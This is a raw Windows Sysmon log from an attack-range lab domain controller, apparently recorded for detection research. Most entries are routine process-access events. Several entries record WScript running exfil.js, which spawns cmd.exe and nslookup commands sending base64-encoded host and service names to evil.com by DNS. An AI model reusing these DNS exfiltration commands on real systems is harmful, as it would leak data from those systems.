14:21:58.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2947-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-18E0-629A-6742-000000005F02}39765884C:\Windows\System32\WScript.exe{2E1864BB-1906-629A-2947-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.120{2E1864BB-1906-629A-2947-000000005F02}4232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbxn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljxth.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-1906-629A-2747-000000005F02}51006580C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2847-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2847-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.075{2E1864BB-1906-629A-2647-000000005F02}65606180C:\Windows\system32\cmd.exe{2E1864BB-1906-629A-2847-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.090{2E1864BB-1906-629A-2847-000000005F02}6208C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1906-629A-2647-000000005F02}6560C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljxth.tmp 2>&1 10341000x8000000000000000217709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.059{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2747-000000005F02}5100C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.059{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2747-000000005F02}5100C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.059{2E1864BB-1906-629A-2747-000000005F02}51006580C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2647-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.059{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2747-000000005F02}5100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2647-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-18E0-629A-6742-000000005F02}39768096C:\Windows\System32\WScript.exe{2E1864BB-1906-629A-2647-000000005F02}6560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.054{2E1864BB-1906-629A-2647-000000005F02}6560C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljxth.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.043{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlqgn.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-1905-629A-2447-000000005F02}47807840C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2547-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S